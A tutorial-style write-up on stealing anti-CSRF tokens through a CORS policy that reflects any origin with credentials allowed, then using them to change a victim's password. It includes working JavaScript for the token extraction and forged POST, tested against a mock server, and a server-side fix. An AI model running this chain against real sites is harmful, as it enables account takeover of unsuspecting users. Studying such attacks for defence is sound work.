Bypassing CSRF token protection by abusing a misconfigured CORS policy

CORS

Brief explanation of SOP, CORS and CSRF (skip if you know already)

https://example.com:4000/a/b.html?user=Alice&year=2019#part2

Understanding our target before the attack

main page
Registration as user/user
Login request (not relevant to the attack)
Logged in and Change Password page
CSRF token in the HTML form
Change password request
Change password response
Change password request, testing for the CORS misconfiguration (Origin header set to a foreign origin)
Change password response, testing for the CORS misconfiguration (the foreign origin is reflected in Access-Control-Allow-Origin with Access-Control-Allow-Credentials: true)

The Attack

Wrapping everything up!

Malicious.html
Complete attack requests
2nd request: the credentialed cross-origin request that fetches the page containing the CSRF token
2nd request response: the response the attacker's script reads the CSRF token from
3rd request: the actual CSRF attack, carrying the extracted token and the password we chose (account takeover)
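The chain the captions above describe (check that the CORS policy exposes the response, read the change-password page with the victim's cookies, pull out the token, replay it in a forged POST), written out as an added example. This is not the article's Malicious.html: the target path `/change_password`, the field names `csrf_token` and `new_password`, and the token value in the mock are assumptions made here so the code runs offline. The attacker-side functions are what a browser would execute; `fetch` is injected so the same logic can be exercised against a constructed vulnerable server and a constructed server that sends no CORS headers.

```javascript
// Added example (not the article's Malicious.html). Assumptions, not from the
// page: the target serves the form at /change_password, the hidden field is
// "csrf_token", the new password field is "new_password".

// A browser lets attacker JS read a credentialed cross-origin response only
// when the server echoes the attacker's exact origin in
// Access-Control-Allow-Origin AND sends Access-Control-Allow-Credentials: true.
// "*" combined with credentials is refused by the browser, so it is not exploitable.
function corsExposesBody(attackerOrigin, headers) {
  const acao = headers['access-control-allow-origin'];
  const acac = (headers['access-control-allow-credentials'] || '').toLowerCase();
  return acao === attackerOrigin && acac === 'true';
}

// Pull the anti-CSRF token out of the form. DOMParser is browser-only, so a
// regex over the hidden <input> is used; both attribute orders are handled.
function extractCsrfToken(html, fieldName = 'csrf_token') {
  const nameFirst = new RegExp(
    `<input[^>]*\\bname=["']${fieldName}["'][^>]*\\bvalue=["']([^"']+)["']`, 'i');
  const valueFirst = new RegExp(
    `<input[^>]*\\bvalue=["']([^"']+)["'][^>]*\\bname=["']${fieldName}["']`, 'i');
  const m = nameFirst.exec(html) || valueFirst.exec(html);
  return m ? m[1] : null;
}

// 2nd request: credentialed GET of the change-password page (the victim's
// session cookie rides along). 3rd request: forged POST carrying the token.
// fetchImpl is injected so the same code runs against browser fetch or a mock.
async function takeover(fetchImpl, target, attackerOrigin, newPassword) {
  const page = await fetchImpl(`${target}/change_password`, {
    method: 'GET', credentials: 'include' });
  // In a real browser a missing or wrong ACAO makes fetch() reject before the
  // body is visible; the mock hands back the headers so the check is exercised.
  if (!corsExposesBody(attackerOrigin, page.headers)) {
    return { ok: false, reason: 'CORS policy does not expose the page' };
  }
  const token = extractCsrfToken(await page.text());
  if (!token) return { ok: false, reason: 'no csrf_token in form' };
  const body = new URLSearchParams({ csrf_token: token, new_password: newPassword });
  const res = await fetchImpl(`${target}/change_password`, {
    method: 'POST', credentials: 'include',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: body.toString() });
  return { ok: res.status === 200, token };
}

// Constructed stand-in for the target. reflectOrigin=true models the
// misconfiguration in the article (the request's Origin echoed back with
// credentials allowed); false models a server that sends no CORS headers.
// callerOrigin plays the role of the Origin header the browser would add.
function makeMockFetch(callerOrigin, { reflectOrigin }) {
  const TOKEN = 'tok-abc123';   // constructed; real apps issue per-session tokens
  let password = 'user';
  const cors = reflectOrigin
    ? { 'access-control-allow-origin': callerOrigin,
        'access-control-allow-credentials': 'true' }
    : {};
  const reply = (status, text) => ({ status, headers: cors, text: async () => text });
  async function fetchImpl(url, init = {}) {
    if ((init.method || 'GET') === 'GET') {
      return reply(200, `<form method="post" action="/change_password">
  <input type="hidden" name="csrf_token" value="${TOKEN}">
  <input type="password" name="new_password">
</form>`);
    }
    const params = new URLSearchParams(init.body);
    if (params.get('csrf_token') !== TOKEN) return reply(403, 'bad csrf token');
    password = params.get('new_password');
    return reply(200, 'password changed');
  }
  fetchImpl.currentPassword = () => password;  // lets a caller observe the outcome
  return fetchImpl;
}
```

The token check on the server is doing its job in both mock variants; what decides the outcome is whether the browser is allowed to hand the token to the attacker's script, which is exactly what the CORS probe in the captions above tests. The fix on the server side is to stop echoing arbitrary `Origin` values: serve `Access-Control-Allow-Origin` only for a fixed allow-list of trusted origins, and never combine a reflected or wildcard origin with `Access-Control-Allow-Credentials: true`.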

Final words
